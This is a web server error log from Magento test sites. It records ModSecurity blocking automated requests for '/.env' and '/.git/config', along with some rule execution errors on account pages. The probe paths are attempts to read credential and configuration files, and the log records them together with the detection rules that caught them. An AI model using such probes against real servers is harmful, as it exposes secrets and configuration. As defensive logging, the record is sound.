[Thu Sep 26 06:31:23.338749 2024] [:error] [pid 2189424] [client 45.148.10.172:33360] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvTjm9P1pkDnd8Zp4o8FegAAAAM"]
[Thu Sep 26 06:31:23.339392 2024] [:error] [pid 2189424] [client 45.148.10.172:33360] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvTjm9P1pkDnd8Zp4o8FegAAAAM"]
[Thu Sep 26 06:31:23.339846 2024] [:error] [pid 2189424] [client 45.148.10.172:33360] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvTjm9P1pkDnd8Zp4o8FegAAAAM"]
[Thu Sep 26 08:31:06.328942 2024] [:error] [pid 2189424] [client 45.148.10.206:53324] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvT_qtP1pkDnd8Zp4o8FfwAAAAM"]
[Thu Sep 26 08:31:06.329832 2024] [:error] [pid 2189424] [client 45.148.10.206:53324] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvT_qtP1pkDnd8Zp4o8FfwAAAAM"]
[Thu Sep 26 08:31:06.330302 2024] [:error] [pid 2189424] [client 45.148.10.206:53324] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvT_qtP1pkDnd8Zp4o8FfwAAAAM"]
[Thu Sep 26 10:43:13.638128 2024] [:error] [pid 2189422] [client 179.43.152.66:55187] [client 179.43.152.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvUeoWufvzn9dipVEdbnygAAAAE"]
[Thu Sep 26 10:43:13.638511 2024] [:error] [pid 2189422] [client 179.43.152.66:55187] [client 179.43.152.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvUeoWufvzn9dipVEdbnygAAAAE"]
[Thu Sep 26 10:43:13.639253 2024] [:error] [pid 2189422] [client 179.43.152.66:55187] [client 179.43.152.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvUeoWufvzn9dipVEdbnygAAAAE"]
[Thu Sep 26 10:43:13.647663 2024] [:error] [pid 2203765] [client 179.43.152.66:55192] [client 179.43.152.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvUeof7TqfW_z3adtnbTkwAAAAc"]
[Thu Sep 26 10:43:13.648288 2024] [:error] [pid 2203765] [client 179.43.152.66:55192] [client 179.43.152.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvUeof7TqfW_z3adtnbTkwAAAAc"]
[Thu Sep 26 10:43:13.648867 2024] [:error] [pid 2203765] [client 179.43.152.66:55192] [client 179.43.152.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZvUeof7TqfW_z3adtnbTkwAAAAc"]
[Fri Sep 27 09:56:25.209413 2024] [:error] [pid 2220629] [client 45.148.10.172:33742] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvZlKXmie-vBelsjsuflZQAAAAI"]
[Fri Sep 27 09:56:25.211076 2024] [:error] [pid 2220629] [client 45.148.10.172:33742] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvZlKXmie-vBelsjsuflZQAAAAI"]
[Fri Sep 27 09:56:25.211554 2024] [:error] [pid 2220629] [client 45.148.10.172:33742] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZvZlKXmie-vBelsjsuflZQAAAAI"]
[Wed Oct 09 21:51:08.051424 2024] [:error] [pid 2487528] [client 92.118.39.244:39894] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwberNRhNr2TroeEyMG-hwAAAAY"]
[Wed Oct 09 21:51:08.053245 2024] [:error] [pid 2487528] [client 92.118.39.244:39894] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwberNRhNr2TroeEyMG-hwAAAAY"]
[Wed Oct 09 21:51:08.053773 2024] [:error] [pid 2487528] [client 92.118.39.244:39894] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwberNRhNr2TroeEyMG-hwAAAAY"]
[Sat Oct 12 11:28:24.370142 2024] [:error] [pid 2550380] [client 45.148.10.59:49352] [client 45.148.10.59] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZwpBOGe2HDwHVwqnbXWhBwAAAAE"]
[Sat Oct 12 11:28:24.370874 2024] [:error] [pid 2550380] [client 45.148.10.59:49352] [client 45.148.10.59] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZwpBOGe2HDwHVwqnbXWhBwAAAAE"]
[Sat Oct 12 11:28:24.371327 2024] [:error] [pid 2550380] [client 45.148.10.59:49352] [client 45.148.10.59] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZwpBOGe2HDwHVwqnbXWhBwAAAAE"]
[Tue Oct 15 00:42:16.713788 2024] [authz_core:error] [pid 2613242] [client 34.135.211.21:34418] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/
[Tue Oct 15 04:54:18.050816 2024] [:error] [pid 2616036] [client 45.129.35.82:7612] [client 45.129.35.82] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zw3ZWgdCSk0GYzaqULJ04gAAAAg"]
[Tue Oct 15 04:54:18.051453 2024] [:error] [pid 2616036] [client 45.129.35.82:7612] [client 45.129.35.82] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zw3ZWgdCSk0GYzaqULJ04gAAAAg"]
[Tue Oct 15 04:54:18.051920 2024] [:error] [pid 2616036] [client 45.129.35.82:7612] [client 45.129.35.82] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zw3ZWgdCSk0GYzaqULJ04gAAAAg"]
[Tue Oct 22 09:54:30.207200 2024] [:error] [pid 2779032] [client 109.120.137.45:51268] [client 109.120.137.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxdaNuqzwqEjJHwkYT2HZwAAAAo"]
[Tue Oct 22 09:54:30.208756 2024] [:error] [pid 2779032] [client 109.120.137.45:51268] [client 109.120.137.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxdaNuqzwqEjJHwkYT2HZwAAAAo"]
[Tue Oct 22 09:54:30.209193 2024] [:error] [pid 2779032] [client 109.120.137.45:51268] [client 109.120.137.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxdaNuqzwqEjJHwkYT2HZwAAAAo"]
[Tue Oct 22 19:31:06.820264 2024] [:error] [pid 2777907] [client 179.43.189.138:43034] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxfhWqxJmGjrTm3HDm0_CAAAAAI"]
[Tue Oct 22 19:31:06.821516 2024] [:error] [pid 2777907] [client 179.43.189.138:43034] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxfhWqxJmGjrTm3HDm0_CAAAAAI"]
[Tue Oct 22 19:31:06.821908 2024] [:error] [pid 2777907] [client 179.43.189.138:43034] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZxfhWqxJmGjrTm3HDm0_CAAAAAI"]
[Tue Oct 22 19:31:10.575866 2024] [:error] [pid 2779050] [client 179.43.189.138:49604] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxfhXlNXsNwIR2d_Wc473gAAABA"]
[Tue Oct 22 19:31:10.576489 2024] [:error] [pid 2779050] [client 179.43.189.138:49604] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxfhXlNXsNwIR2d_Wc473gAAABA"]
[Tue Oct 22 19:31:10.576883 2024] [:error] [pid 2779050] [client 179.43.189.138:49604] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxfhXlNXsNwIR2d_Wc473gAAABA"]
[Wed Nov 06 13:39:32.731673 2024] [:error] [pid 3133844] [client 79.57.36.165:12385] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/createpost/"] [unique_id "ZytjhLccDx5uhGmf7ZeQnQAAAA0"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/create/
[Wed Nov 06 13:39:32.732951 2024] [:error] [pid 3133844] [client 79.57.36.165:12385] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/createpost/"] [unique_id "ZytjhLccDx5uhGmf7ZeQnQAAAA0"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/create/
[Wed Nov 06 13:39:48.248842 2024] [:error] [pid 3133857] [client 79.57.36.165:12390] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/forgotpasswordpost/"] [unique_id "ZytjlPw0Am5hZxGCP1EtrgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/forgotpassword/
[Wed Nov 06 13:39:48.248922 2024] [:error] [pid 3133857] [client 79.57.36.165:12390] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/forgotpasswordpost/"] [unique_id "ZytjlPw0Am5hZxGCP1EtrgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/forgotpassword/
[Wed Nov 06 13:40:25.152305 2024] [:error] [pid 3133845] [client 79.57.36.165:12486] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"] [unique_id "ZytjuRpXqWWAnRfkk7AXlQAAAA4"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/
[Wed Nov 06 13:40:25.152435 2024] [:error] [pid 3133845] [client 79.57.36.165:12486] [client 79.57.36.165] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"] [unique_id "ZytjuRpXqWWAnRfkk7AXlQAAAA4"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/
[Wed Nov 06 15:57:58.243860 2024] [:error] [pid 3134943] [client 217.71.68.23:12184] [client 217.71.68.23] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tLw~~/"] [unique_id "ZyuD9g9_rg72ziZ4tOTCogAAAAA"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tLw~~/
[Wed Nov 06 15:57:58.243929 2024] [:error] [pid 3134943] [client 217.71.68.23:12184] [client 217.71.68.23] ModSecurity: Rule 7fc360c07be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/customer/account/loginPost/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tLw~~/"] [unique_id "ZyuD9g9_rg72ziZ4tOTCogAAAAA"], referer: https://economiasolidale.test.indacotrentino.com/customer/account/login/referer/aHR0cHM6Ly9lY29ub21pYXNvbGlkYWxlLnRlc3QuaW5kYWNvdHJlbnRpbm8uY29tLw~~/
